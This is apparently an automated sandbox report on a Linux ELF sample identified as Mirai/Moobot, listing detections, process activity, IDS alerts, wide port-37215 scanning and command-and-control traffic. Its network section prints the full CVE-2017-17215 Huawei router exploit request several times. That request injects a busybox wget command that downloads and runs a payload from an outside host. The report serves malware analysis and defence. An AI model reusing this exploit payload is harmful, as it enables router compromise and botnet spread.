Linux Analysis Report
8lsvVMbYw7.elf

Overview

General Information

Sample Name:8lsvVMbYw7.elf
Original Sample Name:4db30b3742977f4175543bcc258bba08.elf
Analysis ID:830708
MD5:4db30b3742977f4175543bcc258bba08
SHA1:d4934ed96152dfae36f4b9421b5f5b602f9ed6fe
SHA256:7e4dadf93fbb7a01b55eadacbb40ae8d5e95f5b9592e55f0fb2340d89fc78f17
Tags:32 elf mips mirai
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which no longer works.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830708
Start date and time:2023-03-20 16:19:55 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 2s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:8lsvVMbYw7.elf
Original Sample Name:4db30b3742977f4175543bcc258bba08.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/8lsvVMbYw7.elf
PID:6211
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • 8lsvVMbYw7.elf (PID: 6211, Parent: 6129, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/8lsvVMbYw7.elf
    • sh (PID: 6213, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/8lsvVMbYw7.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6215, Parent: 6213)
      • rm (PID: 6215, Parent: 6213, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6216, Parent: 6213)
      • mkdir (PID: 6216, Parent: 6213, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6217, Parent: 6213)
      • mv (PID: 6217, Parent: 6213, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/8lsvVMbYw7.elf bin/watchdog
      • sh New Fork (PID: 6218, Parent: 6213)
      • chmod (PID: 6218, Parent: 6213, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: MooBot
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
Source: 8lsvVMbYw7.elf, Rule: JoeSecurity_Moobot, Description: Yara detected Moobot, Author: Joe Security
Source: 8lsvVMbYw7.elf, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: 8lsvVMbYw7.elf, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, Rule: JoeSecurity_Moobot, Description: Yara detected Moobot, Author: Joe Security
Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: 6211.1.00007f3790400000.00007f3790414000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Source: Process Memory Space: 8lsvVMbYw7.elf PID: 6211, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
Timestamp: 03/20/23-16:21:16.976524, SID: 2835222, 192.168.2.23:53672 -> 93.94.199.119:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:21:34.558345, SID: 2835222, 192.168.2.23:39438 -> 94.187.107.90:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:21:45.948271, SID: 2835222, 192.168.2.23:37918 -> 203.6.74.105:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:20:44.511900, SID: 2023883, 192.168.2.23:43281 -> 8.8.8.8:53, Protocol: UDP, Classtype: Potentially Bad Traffic
Timestamp: 03/20/23-16:21:24.722739, SID: 2030489, 156.224.24.249:56999 -> 192.168.2.23:47796, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:22:44.755597, SID: 2030489, 156.224.24.249:56999 -> 192.168.2.23:47806, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:22:30.124421, SID: 2835222, 192.168.2.23:49508 -> 197.234.43.110:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:21:23.129262, SID: 2835222, 192.168.2.23:45328 -> 41.36.73.52:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:21:34.964696, SID: 2030490, 192.168.2.23:47806 -> 156.224.24.249:56999, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:22:16.668019, SID: 2835222, 192.168.2.23:58096 -> 197.39.71.73:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:22:02.177570, SID: 2835222, 192.168.2.23:42520 -> 86.71.8.242:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:20:45.109110, SID: 2030490, 192.168.2.23:47796 -> 156.224.24.249:56999, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:22:19.853858, SID: 2835222, 192.168.2.23:47896 -> 192.107.143.159:37215, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 03/20/23-16:21:34.369876, SID: 2023883, 192.168.2.23:46438 -> 8.8.8.8:53, Protocol: UDP, Classtype: Potentially Bad Traffic

          AV Detection

Source: 8lsvVMbYw7.elf, Virustotal: Detection: 60%
Source: 8lsvVMbYw7.elf, ReversingLabs: Detection: 64%

          Networking

Source: Traffic, Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:43281 -> 8.8.8.8:53
Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53672 -> 93.94.199.119:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45328 -> 41.36.73.52:37215
Source: Traffic, Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:46438 -> 8.8.8.8:53
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39438 -> 94.187.107.90:37215
Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47806 -> 156.224.24.249:56999
Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47806
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37918 -> 203.6.74.105:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42520 -> 86.71.8.242:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58096 -> 197.39.71.73:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47896 -> 192.107.143.159:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49508 -> 197.234.43.110:37215
Source: global traffic, TCP traffic: 197.9.164.30 ports 1,2,3,5,7,37215
Source: global traffic, TCP traffic: 157.160.77.243 ports 1,2,3,5,7,37215
Source: global traffic, TCP traffic: 191.61.231.41 ports 1,2,3,5,7,37215
Source: global traffic, TCP traffic: 197.6.41.68 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.160.0.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.106.194.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 64.175.133.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 108.166.166.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 158.204.236.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 125.119.36.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 213.197.129.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.152.36.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.50.252.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 54.240.123.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.223.224.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 53.103.122.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.61.184.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.84.249.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 143.51.140.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 123.126.220.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.129.69.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 135.34.141.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.247.102.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.19.135.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 221.232.253.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.130.130.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.17.120.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.108.19.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 91.254.175.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.179.44.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.45.254.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 133.78.193.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.172.180.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.21.120.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.108.203.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.202.247.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.133.182.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.169.90.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.176.180.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.55.76.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 121.26.97.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.176.205.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.253.137.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.250.118.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 88.179.191.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.198.54.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 160.44.187.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.4.254.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.228.106.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.252.34.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.81.47.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 121.160.106.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.162.73.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.210.130.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.69.43.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 208.82.148.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.169.86.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.11.7.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.70.233.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 134.162.60.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.0.70.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.230.176.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.134.143.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 133.224.69.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.36.122.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.253.150.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.212.191.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.144.181.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.211.150.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.74.25.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 166.153.243.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.115.176.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.104.24.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.18.86.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.0.134.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.235.67.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.114.211.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 194.231.78.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 184.217.181.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 160.202.147.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 42.202.88.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.76.35.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.234.252.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.101.178.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.81.237.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.62.253.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 141.239.71.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 64.253.73.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.34.73.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.15.254.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.241.229.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.39.189.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.143.74.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.197.170.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.155.69.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.17.41.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.95.75.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.102.235.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.247.98.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.219.222.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.118.150.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.176.54.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.43.129.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.148.225.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.165.106.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 41.203.8.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.229.254.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 52.211.99.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 157.58.44.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:31105 -> 197.243.212.205:37215
          Source: global traffic TCP traffic: 192.168.2.23:47796 -> 156.224.24.249:56999
          Source: global traffic
          HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
